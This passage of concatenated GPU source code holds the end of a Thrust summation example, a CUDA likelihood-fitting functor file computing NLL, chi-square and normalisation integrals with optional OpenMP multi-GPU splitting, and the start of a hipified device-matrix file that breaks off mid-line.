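    for (int i = 0; i < eventSize; ++i) total += eventAddress[i];
    return total;
  }
};

int main() {
  const int numEntries = 1000;
  const int numVars = 3;
  thrust::device_vector<float> data(numEntries * numVars, 1.0f);
  float* dataArray = thrust::raw_pointer_cast(data.data());

  thrust::counting_iterator<int> eventIndex(0);
  thrust::constant_iterator<float*> arrayAddress(dataArray);
  thrust::constant_iterator<int> eventSize(numVars);
  thrust::plus<double> summer;
  double dummy = 0;

  double sum = thrust::transform_reduce(
      thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)),
      thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)),
      SumEvent(), dummy, summer);
  std::cout << "sum = " << sum << std::endl;  // 3000 for this fill
  return 0;
}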
e82d1d33266c5e3b8b740e413f75b35ab8018ee4.cu
#include "../GlobalCudaDefines.hh" #include "ThrustPdfFunctor.hh" #include "thrust/sequence.h" #include "thrust/iterator/constant_iterator.h" //#ifdef CUDAPRINT #include "cuPrintf.cu" #include <fstream> //#endif // These variables are either function-pointer related (thus specific to this implementation) // or constrained to be in the CUDAglob translation unit by nvcc limitations; otherwise they // would be in FunctorBase. // Device-side, translation-unit constrained. __constant__ fptype cudaArray[maxParams]; // Holds device-side fit parameters. __constant__ unsigned int paramIndices[maxParams]; // Holds functor-specific indices into cudaArray. Also overloaded to hold integer constants (ie parameters that cannot vary.) __constant__ fptype functorConstants[maxParams]; // Holds non-integer constants. Notice that first entry is number of events. __constant__ fptype normalisationFactors[maxParams]; // For debugging __constant__ int callnumber; __constant__ int gpuDebug; __constant__ unsigned int debugParamIndex; __device__ int internalDebug1 = -1; __device__ int internalDebug2 = -1; __device__ int internalDebug3 = -1; int cpuDebug = 0; // Function-pointer related. __device__ void* device_function_table[200]; // Not clear why this cannot be __constant__, but it causes crashes to declare it so. void* host_function_table[200]; unsigned int num_device_functions = 0; #ifdef OMP_ON // Make functionAddressToDevideIndexMap and array of maps indexed by thread id since // I get the following compiler error if I try to make it threadprivate. // "functionAddressToDeviceIndexMap’ declared ‘threadprivate’ after first use" typedef std::map<void*, int> tMapType; tMapType functionAddressToDeviceIndexMap[MAX_THREADS]; #pragma omp threadprivate(host_function_table, num_device_functions) fptype gSum; fptype sums[MAX_THREADS]; double gLognorm; double lognorms[MAX_THREADS]; #else std::map<void*, int> functionAddressToDeviceIndexMap; #endif #define cutilSafeCall(err) __cudaSafeCall(err, __FILE__, __LINE__) // For use in debugging memory issues void printMemoryStatus (std::string file, int line) { size_t memfree = 0; size_t memtotal = 0; cudaDeviceSynchronize(); cudaMemGetInfo(&memfree, &memtotal); cudaDeviceSynchronize(); std::cout << "Memory status " << file << " " << line << " Free " << memfree << " Total " << memtotal << " Used " << (memtotal - memfree) << std::endl; } #include <execinfo.h> void* stackarray[10]; void abortWithCudaPrintFlush (std::string file, int line, std::string reason, const FunctorBase* pdf = 0) { #ifdef CUDAPRINT cudaPrintfDisplay(stdout, true); cudaPrintfEnd(); #endif std::cout << "Abort called from " << file << " line " << line << " due to " << reason << std::endl; if (pdf) { std::set<Variable*> pars; pdf->getParameters(pars); std::cout << "Parameters of " << pdf->getName() << " : \n"; for (std::set<Variable*>::iterator v = pars.begin(); v != pars.end(); ++v) { if (0 > (*v)->index) continue; std::cout << " " << (*v)->name << " (" << (*v)->index << ") :\t" << host_params[(*v)->index] << std::endl; } } std::cout << "Parameters (" << totalParams << ") :\n"; for (int i = 0; i < totalParams; ++i) { std::cout << host_params[i] << " "; } std::cout << std::endl; // get void* pointers for all entries on the stack size_t size = backtrace(stackarray, 10); // print out all the frames to stderr backtrace_symbols_fd(stackarray, size, 2); exit(1); } void __cudaSafeCall (cudaError err, const char* file, int line) { if (cudaSuccess != err) { std::cout << "Error code " << err << " (" << 
cudaGetErrorString(err) << ") at " << file << ", " << line << std::endl; exit(1); } } __device__ fptype calculateEval (fptype rawPdf, fptype* evtVal, unsigned int par) { // Just return the raw PDF value, for use in (eg) normalisation. return rawPdf; } __device__ fptype calculateNLL (fptype rawPdf, fptype* evtVal, unsigned int par) { //if ((10 > callnumber) && (threadIdx.x < 10) && (blockIdx.x == 0)) cuPrintf("calculateNll %i %f %f %f\n", callnumber, rawPdf, normalisationFactors[par], rawPdf*normalisationFactors[par]); rawPdf *= normalisationFactors[par]; return rawPdf > 0 ? -LOG(rawPdf) : 0; } __device__ fptype calculateProb (fptype rawPdf, fptype* evtVal, unsigned int par) { // Return probability, ie normalised PDF value. return rawPdf * normalisationFactors[par]; } __device__ fptype calculateBinAvg (fptype rawPdf, fptype* evtVal, unsigned int par) { rawPdf *= normalisationFactors[par]; rawPdf *= evtVal[1]; // Bin volume // Log-likelihood of numEvents with expectation of exp is (-exp + numEvents*ln(exp) - ln(numEvents!)). // The last is constant, so we drop it; and then multiply by minus one to get the negative log-likelihood. if (rawPdf > 0) { fptype expEvents = functorConstants[0]*rawPdf; return (expEvents - evtVal[0]*log(expEvents)); } return 0; } __device__ fptype calculateBinWithError (fptype rawPdf, fptype* evtVal, unsigned int par) { // In this case interpret the rawPdf as just a number, not a number of events. // Do not divide by integral over phase space, do not multiply by bin volume, // and do not collect 200 dollars. evtVal should have the structure (bin entry, bin error). //printf("[%i, %i] ((%f - %f) / %f)^2 = %f\n", blockIdx.x, threadIdx.x, rawPdf, evtVal[0], evtVal[1], POW((rawPdf - evtVal[0]) / evtVal[1], 2)); rawPdf -= evtVal[0]; // Subtract observed value. rawPdf /= evtVal[1]; // Divide by error. rawPdf *= rawPdf; return rawPdf; } __device__ fptype calculateChisq (fptype rawPdf, fptype* evtVal, unsigned int par) { rawPdf *= normalisationFactors[par]; rawPdf *= evtVal[1]; // Bin volume return pow(rawPdf * functorConstants[0] - evtVal[0], 2) / (evtVal[0] > 1 ? evtVal[0] : 1); } __device__ device_metric_ptr ptr_to_Eval = calculateEval; __device__ device_metric_ptr ptr_to_NLL = calculateNLL; __device__ device_metric_ptr ptr_to_Prob = calculateProb; __device__ device_metric_ptr ptr_to_BinAvg = calculateBinAvg; __device__ device_metric_ptr ptr_to_BinWithError = calculateBinWithError; __device__ device_metric_ptr ptr_to_Chisq = calculateChisq; void* host_fcn_ptr = 0; void* getMetricPointer (std::string name) { #define CHOOSE_PTR(ptrname) if (name == #ptrname) cudaMemcpyFromSymbol((void**) &host_fcn_ptr, ptrname, sizeof(void*)) host_fcn_ptr = 0; CHOOSE_PTR(ptr_to_Eval); CHOOSE_PTR(ptr_to_NLL); CHOOSE_PTR(ptr_to_Prob); CHOOSE_PTR(ptr_to_BinAvg); CHOOSE_PTR(ptr_to_BinWithError); CHOOSE_PTR(ptr_to_Chisq); assert(host_fcn_ptr); return host_fcn_ptr; #undef CHOOSE_PTR } ThrustPdfFunctor::ThrustPdfFunctor (Variable* x, std::string n) : FunctorBase(x, n) , logger(0) {} __host__ int ThrustPdfFunctor::findFunctionIdx (void* dev_functionPtr) { // Code specific to function-pointer implementation #ifdef OMP_ON int tid = omp_get_thread_num(); std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap[tid].find(dev_functionPtr); // Use find instead of [] to avoid returning 0 if the index doesn't exist. 
if (localPos != functionAddressToDeviceIndexMap[tid].end()) { return (*localPos).second; } #else std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap.find(dev_functionPtr); if (localPos != functionAddressToDeviceIndexMap.end()) { return (*localPos).second; } #endif int fIdx = num_device_functions; host_function_table[num_device_functions] = dev_functionPtr; #ifdef OMP_ON functionAddressToDeviceIndexMap[tid][dev_functionPtr] = num_device_functions; #else functionAddressToDeviceIndexMap[dev_functionPtr] = num_device_functions; #endif num_device_functions++; cutilSafeCall(cudaMemcpyToSymbol(device_function_table, host_function_table, num_device_functions*sizeof(void*))); return fIdx; } __host__ void ThrustPdfFunctor::initialise (std::vector<unsigned int> pindices, void* dev_functionPtr) { if (!fitControl) setFitControl(new UnbinnedNllFit()); // MetricTaker must be created after FunctorBase initialisation is done. FunctorBase::initialiseIndices(pindices); functionIdx = findFunctionIdx(dev_functionPtr); setMetrics(); } __host__ void ThrustPdfFunctor::setDebugMask (int mask, bool setSpecific) const { cpuDebug = mask; cudaMemcpyToSymbol(gpuDebug, &cpuDebug, sizeof(int), 0, cudaMemcpyHostToDevice); if (setSpecific) cudaMemcpyToSymbol(debugParamIndex, &parameters, sizeof(unsigned int), 0, cudaMemcpyHostToDevice); } __host__ void ThrustPdfFunctor::setMetrics () { if (logger) delete logger; logger = new MetricTaker(this, getMetricPointer(fitControl->getMetric())); } __host__ double ThrustPdfFunctor::sumOfNll (int numVars) const { static thrust::plus<double> cudaPlus; thrust::constant_iterator<int> eventSize(numVars); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); double dummy = 0; //if (host_callnumber >= 2) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " debug abort", this); #ifdef OMP_ON unsigned int thFirstEntry, thLastEntry; int tid, nthreads; int j; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); thFirstEntry = tid*(numEntries)/nthreads; thLastEntry = (tid+1)*(numEntries)/nthreads; // std::cout << tid << ": " << numEntries << " " << thFirstEntry << " " << thLastEntry << std::endl; // std::cout << "Extended term: " << numVars << " " << numEntries << " " << numEvents << std::endl; thrust::counting_iterator<int> eventIndex(0); lognorms[tid] = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thFirstEntry, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thLastEntry, arrayAddress, eventSize)), *logger, dummy, cudaPlus); #pragma omp barrier if (tid == 0) { gLognorm = 0; for (j = 0; j < nthreads; j++) gLognorm += lognorms[j]; } #pragma omp barrier // std::cout << tid << ": Full NLL: " << ret << " " << gLognorm << " " << lognorm << std::endl; return gLognorm; #else thrust::counting_iterator<int> eventIndex(0); return thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), *logger, dummy, cudaPlus); #endif } __host__ double ThrustPdfFunctor::calculateNLL () const { //if (cpuDebug & 1) std::cout << getName() << " entering calculateNLL" << std::endl; //int oldMask = cpuDebug; //if (0 == host_callnumber) setDebugMask(0, false); normalise(); //if ((0 == host_callnumber) && (1 == oldMask)) setDebugMask(1, false); /* if (cpuDebug & 1) { std::cout << "Norm factors: "; for (int i = 0; i < totalParams; ++i) std::cout << 
host_normalisation[i] << " "; std::cout << std::endl; } */ cudaMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, cudaMemcpyHostToDevice); cudaDeviceSynchronize(); // Ensure normalisation integrals are finished int numVars = observables.size(); if (fitControl->binnedFit()) { numVars += 2; numVars *= -1; } fptype ret = sumOfNll(numVars); if (0 == ret) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " zero NLL", this); //if (cpuDebug & 1) std::cout << "Full NLL " << host_callnumber << " : " << 2*ret << std::endl; //setDebugMask(0); //if ((cpuDebug & 1) && (host_callnumber >= 1)) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " debug abort", this); return 2*ret; } __host__ void ThrustPdfFunctor::evaluateAtPoints (Variable* var, std::vector<fptype>& res) { // NB: This does not project correctly in multidimensional datasets, because all observables // other than 'var' will have, for every event, whatever value they happened to get set to last // time they were set. This is likely to be the value from the last event in whatever dataset // you were fitting to, but at any rate you don't get the probability-weighted integral over // the other observables. copyParams(); normalise(); cudaMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, cudaMemcpyHostToDevice); UnbinnedDataSet tempdata(observables); double step = (var->upperlimit - var->lowerlimit) / var->numbins; for (int i = 0; i < var->numbins; ++i) { var->value = var->lowerlimit + (i+0.5)*step; tempdata.addEvent(); } setData(&tempdata); thrust::counting_iterator<int> eventIndex(0); thrust::constant_iterator<int> eventSize(observables.size()); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::device_vector<fptype> results(var->numbins); MetricTaker evalor(this, getMetricPointer("ptr_to_Eval")); #ifdef OMP_ON unsigned int thFirstEntry, thLastEntry; int tid, nthreads; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); // use var->numbins or numEntries here? 
thFirstEntry = tid*(var->numbins)/nthreads; thLastEntry = (tid+1)*(var->numbins)/nthreads; thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex+thFirstEntry, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thLastEntry, arrayAddress, eventSize)), results.begin()+thFirstEntry, evalor); #pragma omp barrier #else thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), results.begin(), evalor); #endif thrust::host_vector<fptype> h_results = results; res.clear(); res.resize(var->numbins); for (int i = 0; i < var->numbins; ++i) { res[i] = h_results[i] * host_normalisation[parameters]; } } __host__ void ThrustPdfFunctor::evaluateAtPoints (std::vector<fptype>& points) const { /* std::set<Variable*> vars; getParameters(vars); unsigned int maxIndex = 0; for (std::set<Variable*>::iterator i = vars.begin(); i != vars.end(); ++i) { if ((*i)->getIndex() < maxIndex) continue; maxIndex = (*i)->getIndex(); } std::vector<double> params; params.resize(maxIndex+1); for (std::set<Variable*>::iterator i = vars.begin(); i != vars.end(); ++i) { if (0 > (*i)->getIndex()) continue; params[(*i)->getIndex()] = (*i)->value; } copyParams(params); thrust::device_vector<fptype> d_vec = points; normalise(); cudaMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, cudaMemcpyHostToDevice); thrust::transform(d_vec.begin(), d_vec.end(), d_vec.begin(), *evalor); thrust::host_vector<fptype> h_vec = d_vec; for (unsigned int i = 0; i < points.size(); ++i) points[i] = h_vec[i]; */ } __host__ void ThrustPdfFunctor::scan (Variable* var, std::vector<fptype>& values) { fptype step = var->upperlimit; step -= var->lowerlimit; step /= var->numbins; values.clear(); for (fptype v = var->lowerlimit + 0.5*step; v < var->upperlimit; v += step) { var->value = v; copyParams(); fptype curr = calculateNLL(); values.push_back(curr); } } __host__ void ThrustPdfFunctor::setParameterConstantness (bool constant) { std::set<Variable*> pars; getParameters(pars); for (std::set<Variable*>::iterator p = pars.begin(); p != pars.end(); ++p) { (*p)->fixed = constant; } } __host__ fptype ThrustPdfFunctor::getValue () { // Returns the value of the PDF at a single point. 
// Execute redundantly in all threads for OpenMP multiGPU case copyParams(); normalise(); cudaMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, cudaMemcpyHostToDevice); UnbinnedDataSet point(observables); point.addEvent(); setData(&point); thrust::counting_iterator<int> eventIndex(0); thrust::constant_iterator<int> eventSize(observables.size()); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::device_vector<fptype> results(1); MetricTaker evalor(this, getMetricPointer("ptr_to_Eval")); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + 1, arrayAddress, eventSize)), results.begin(), evalor); return results[0]; } __host__ fptype ThrustPdfFunctor::normalise () const { //if (cpuDebug & 1) std::cout << "Normalising " << getName() << " " << hasAnalyticIntegral() << " " << normRanges << std::endl; if (!fitControl->metricIsPdf()) { host_normalisation[parameters] = 1.0; return 1.0; } fptype ret = 1; if (hasAnalyticIntegral()) { for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { // Loop goes only over observables of this PDF. //std::cout << "Analytically integrating " << getName() << " over " << (*v)->name << std::endl; ret *= integrate((*v)->lowerlimit, (*v)->upperlimit); } host_normalisation[parameters] = 1.0/ret; //if (cpuDebug & 1) std::cout << "Analytic integral of " << getName() << " is " << ret << std::endl; return ret; } int totalBins = 1; for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { ret *= ((*v)->upperlimit - (*v)->lowerlimit); totalBins *= (integrationBins > 0 ? integrationBins : (*v)->numbins); //if (cpuDebug & 1) std::cout << "Total bins " << totalBins << " due to " << (*v)->name << " " << integrationBins << " " << (*v)->numbins << std::endl; } ret /= totalBins; fptype dummy = 0; static thrust::plus<fptype> cudaPlus; thrust::constant_iterator<fptype*> arrayAddress(normRanges); thrust::constant_iterator<int> eventSize(observables.size()); thrust::counting_iterator<int> binIndex(0); #ifdef OMP_ON unsigned int thFirstBin, thLastBin; int tid, nthreads; int j; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); thFirstBin = tid*(totalBins)/nthreads; thLastBin = (tid+1)*(totalBins)/nthreads; //std::cout << "totalBins = " << totalBins << " thFirstBin = " << thFirstBin << " thLastBin = " << thLastBin << std::endl; sums[tid] = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(binIndex + thFirstBin, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + thLastBin, eventSize, arrayAddress)), *logger, dummy, cudaPlus); cudaThreadSynchronize(); // Ensure logger is done #pragma omp barrier if (tid == 0) { gSum = 0; for (j=0; j<nthreads; j++) gSum += sums[j]; } // std::cout << tid << ": sum = " << sum << " gSum = " << gSum << std::endl; #pragma omp barrier if (isnan(gSum)) { abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " NaN in normalisation", this); } else if (0 == gSum) { abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero in normalisation", this); } ret *= gSum; #else fptype sum = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(binIndex, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + totalBins, eventSize, arrayAddress)), *logger, dummy, cudaPlus); if (isnan(sum)) { abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " NaN in normalisation", this); } else if (0 == sum) { 
abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero in normalisation", this); } //if (cpuDebug & 1) std::cout << getName() << " integral is " << ret << " " << sum << " " << (ret*sum) << " " << (1.0/(ret*sum)) << std::endl; ret *= sum; #endif if (0 == ret) abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero integral"); host_normalisation[parameters] = 1.0/ret; return (fptype) ret; } // Notice that operators are distinguished by the order of the operands, // and not otherwise! It's up to the user to make his tuples correctly. // Main operator: Calls the PDF to get a predicted value, then the metric // to get the goodness-of-prediction number which is returned to MINUIT. __device__ fptype MetricTaker::operator () (thrust::tuple<int, fptype*, int> t) const { int eventIndex = thrust::get<0>(t); int eventSize = thrust::get<2>(t); fptype* eventAddress = thrust::get<1>(t) + (eventIndex * abs(eventSize)); // Causes stack size to be statically undeterminable. fptype ret = (*(reinterpret_cast<device_function_ptr>(device_function_table[functionIdx])))(eventAddress, cudaArray, paramIndices+parameters); // Notice assumption here! For unbinned fits the 'eventAddress' pointer won't be used // in the metric, so it doesn't matter what it is. For binned fits it is assumed that // the structure of the event is (obs1 obs2... binentry binvolume), so that the array // passed to the metric consists of (binentry binvolume); unless the data has // user-provided errors, in which case binvolume is replaced by binError. ret = (*(reinterpret_cast<device_metric_ptr>(device_function_table[metricIndex])))(ret, eventAddress + (abs(eventSize)-2), parameters); return ret; } // Operator for binned evaluation, no metric. // Used in normalisation. #define MAX_NUM_OBSERVABLES 5 __device__ fptype MetricTaker::operator () (thrust::tuple<int, int, fptype*> t) const { // Bin index, event size, base address [lower, upper, numbins] int evtSize = thrust::get<1>(t); assert(evtSize <= MAX_NUM_OBSERVABLES); int binNumber = thrust::get<0>(t); // Do not understand why this cannot be declared __shared__. Dynamically allocating shared memory is apparently complicated. //fptype* binCenters = (fptype*) malloc(evtSize * sizeof(fptype)); __shared__ fptype binCenters[1024*MAX_NUM_OBSERVABLES]; // To convert global bin number to (x,y,z...) coordinates: For each dimension, take the mod // with the number of bins in that dimension. Then divide by the number of bins, in effect // collapsing so the grid has one fewer dimension. Rinse and repeat. unsigned int* indices = paramIndices + parameters; for (int i = 0; i < evtSize; ++i) { fptype lowerBound = thrust::get<2>(t)[3*i+0]; fptype upperBound = thrust::get<2>(t)[3*i+1]; int numBins = (int) FLOOR(thrust::get<2>(t)[3*i+2] + 0.5); int localBin = binNumber % numBins; fptype x = upperBound - lowerBound; x /= numBins; x *= (localBin + 0.5); x += lowerBound; binCenters[indices[indices[0] + 2 + i]+threadIdx.x*MAX_NUM_OBSERVABLES] = x; binNumber /= numBins; //if (gpuDebug & 1) //if ((gpuDebug & 1) && (0 == threadIdx.x) && (0 == blockIdx.x)) //printf("[%i, %i] Bins: %i %i %i %f %f %f %f %i\n", blockIdx.x, threadIdx.x, binNumber, numBins, localBin, x, lowerBound, upperBound, thrust::get<2>(t)[3*i+2], indices[indices[0] + 2 + i]); //printf("Bins: %i %i %i %f %f\n", i, indices[indices[0] + 2 + i]+threadIdx.x*MAX_NUM_OBSERVABLES, indices[indices[0] + 2 + i], x, binCenters[threadIdx.x*MAX_NUM_OBSERVABLES]); } // Causes stack size to be statically undeterminable. 
fptype ret = (*(reinterpret_cast<device_function_ptr>(device_function_table[functionIdx])))(binCenters+threadIdx.x*MAX_NUM_OBSERVABLES, cudaArray, indices); //if (gpuDebug & 1) printf("[%i, %i] Binned eval: %f %f\n", blockIdx.x, threadIdx.x, binCenters[threadIdx.x*4], ret); return ret; } __host__ void ThrustPdfFunctor::getCompProbsAtDataPoints (std::vector<std::vector<fptype> >& values) { //cpuDebug = 1; copyParams(); double overall = normalise(); cudaMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, cudaMemcpyHostToDevice); //setDebugMask(1); int numVars = observables.size(); if (fitControl->binnedFit()) { numVars += 2; numVars *= -1; } thrust::device_vector<fptype> results(numEntries); thrust::constant_iterator<int> eventSize(numVars); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::counting_iterator<int> eventIndex(0); MetricTaker evalor(this, getMetricPointer("ptr_to_Prob")); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), results.begin(), evalor); //setDebugMask(0); values.clear(); values.resize(components.size() + 1); thrust::host_vector<fptype> host_results = results; //std::cout << "Overall: " << overall << " " << host_normalisation[getParameterIndex()] << " " << host_results[0] << " " << numVars << " " << numEntries << " " << host_results.size() << std::endl; for (unsigned int i = 0; i < host_results.size(); ++i) { values[0].push_back(host_results[i]); } for (unsigned int i = 0; i < components.size(); ++i) { MetricTaker compevalor(components[i], getMetricPointer("ptr_to_Prob")); thrust::counting_iterator<int> ceventIndex(0); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(ceventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(ceventIndex + numEntries, arrayAddress, eventSize)), results.begin(), compevalor); host_results = results; //std::cout << "Normalisation " << components[i]->getName() << ": " << host_results[0] << ", " << host_normalisation[components[i]->getParameterIndex()] << std::endl; for (unsigned int j = 0; j < host_results.size(); ++j) { values[1 + i].push_back(host_results[j]); } } } // still need to add OpenMP/multi-GPU code here __host__ void ThrustPdfFunctor::transformGrid (fptype* host_output) { generateNormRange(); //normalise(); int totalBins = 1; for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { totalBins *= (*v)->numbins; } thrust::constant_iterator<fptype*> arrayAddress(normRanges); thrust::constant_iterator<int> eventSize(observables.size()); thrust::counting_iterator<int> binIndex(0); thrust::device_vector<fptype> d_vec; d_vec.resize(totalBins); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(binIndex, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + totalBins, eventSize, arrayAddress)), d_vec.begin(), *logger); thrust::host_vector<fptype> h_vec = d_vec; for (unsigned int i = 0; i < totalBins; ++i) host_output[i] = h_vec[i]; } MetricTaker::MetricTaker (FunctorBase* dat, void* dev_functionPtr) : metricIndex(0) , functionIdx(dat->getFunctionIndex()) , parameters(dat->getParameterIndex()) { //std::cout << "MetricTaker constructor with " << functionIdx << std::endl; #ifdef OMP_ON int tid = omp_get_thread_num(); std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap[tid].find(dev_functionPtr); // Use find instead of [] to avoid 
returning 0 if the index doesn't exist. if (localPos != functionAddressToDeviceIndexMap[tid].end()) { metricIndex = (*localPos).second; } #else std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap.find(dev_functionPtr); if (localPos != functionAddressToDeviceIndexMap.end()) { metricIndex = (*localPos).second; } #endif else { metricIndex = num_device_functions; host_function_table[num_device_functions] = dev_functionPtr; #ifdef OMP_ON functionAddressToDeviceIndexMap[tid][dev_functionPtr] = num_device_functions; #else functionAddressToDeviceIndexMap[dev_functionPtr] = num_device_functions; #endif num_device_functions++; cutilSafeCall(cudaMemcpyToSymbol(device_function_table, host_function_table, num_device_functions*sizeof(void*))); } } MetricTaker::MetricTaker (int fIdx, int pIdx) : metricIndex(0) , functionIdx(fIdx) , parameters(pIdx) { // This constructor should only be used for binned evaluation, ie for integrals. } __host__ void ThrustPdfFunctor::setFitControl (FitControl* const fc, bool takeOwnerShip) { for (unsigned int i = 0; i < components.size(); ++i) { components[i]->setFitControl(fc, false); } if ((fitControl) && (fitControl->getOwner() == this)) { delete fitControl; } fitControl = fc; if (takeOwnerShip) { fitControl->setOwner(this); } setMetrics(); } #include "FunctorBase.cu"
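The binned-evaluation operator in the file above converts a flat bin number into per-dimension bin centres by repeatedly taking the modulus with, and then dividing by, the bin count of each observable, exactly as its comment describes. The host-side sketch below reproduces only that index arithmetic; the observable count, ranges and bin counts are made-up values for illustration and are not taken from the file.

// bin_decompose_sketch.cpp -- illustrative only; names and values are hypothetical.
#include <cstdio>

int main() {
    // Each observable is described by (lower, upper, numBins), matching the
    // [lower, upper, numbins] triplets the binned operator reads per dimension.
    const int nObs = 2;                       // assumed number of observables
    double lower[nObs]   = {0.0, -1.0};       // assumed ranges
    double upper[nObs]   = {10.0, 1.0};
    int    numBins[nObs] = {5, 4};

    int totalBins = 1;
    for (int i = 0; i < nObs; ++i) totalBins *= numBins[i];

    for (int globalBin = 0; globalBin < totalBins; ++globalBin) {
        int bin = globalBin;
        printf("global bin %2d ->", globalBin);
        for (int i = 0; i < nObs; ++i) {
            int localBin = bin % numBins[i];               // coordinate in dimension i
            double width = (upper[i] - lower[i]) / numBins[i];
            double center = lower[i] + (localBin + 0.5) * width;
            printf(" [dim %d: bin %d, centre %.2f]", i, localBin, center);
            bin /= numBins[i];                             // collapse this dimension
        }
        printf("\n");
    }
    return 0;
}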
04df184b087f062b49c6a072109247331418ccbf.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <device_matrix.h> #include <thrust/transform_reduce.h> #include <thrust/functional.h> #include <thrust/host_vector.h> #include <thrust/device_vector.h> #define mylog(token) {std::cout << #token " = " << token << std::endl;} template <typename T> hipStream_t device_matrix<T>::_cuda_stream = 0; template <typename T> void device_matrix<T>::setCudaStream(hipStream_t& streamId) { hipblasSetStream(CUBLAS_HANDLE::getInstance(), streamId); _cuda_stream = streamId; } // =============================== // ===== class device_matrix ===== // =============================== template <typename T> __global__ void naiveMatrixTranspose(T *odata, const T *idata, const int rows, const int cols) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < cols && y < rows) { odata[x*rows + y] = idata[y*cols+ x]; } } template <typename T> device_matrix<T>::device_matrix(): _rows(0), _cols(0), _capacity(_rows * _cols), _data(NULL) { } template <typename T> device_matrix<T>::device_matrix(size_t r, size_t c): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); // Be careful to comment the following line. // If the user think the default value are 0, it may give rise to creepy NaN. // fillwith(0); } template <typename T> device_matrix<T>::device_matrix(size_t r, size_t c, T value): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); fillwith(value); } template <typename T> device_matrix<T>::device_matrix(T* h_data, size_t r, size_t c): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); CCE(hipMemcpy(_data, h_data, sizeof(T) * _rows * _cols, hipMemcpyHostToDevice)); } template <typename T> device_matrix<T>::device_matrix(const std::string& filename): _rows(0), _cols(0), _capacity(_rows*_cols), _data(NULL) { const size_t MAX_BUFFER = 262144; char line[MAX_BUFFER]; FILE* fid = fopen(filename.c_str(), "r"); while (fgets(line, MAX_BUFFER, fid)) { _rows++; assert(line[strlen(line) - 1] == '\n'); if (_cols != 0) { continue; } char* token = strtok(line, " \n"); ++_cols; while(strtok(NULL, " \n")) { ++_cols; } } fseek(fid, 0, SEEK_SET); // BEWARE !! // BLAS stores data in column-major const char *rspecifier = (sizeof(T) / sizeof(float) == 1) ? 
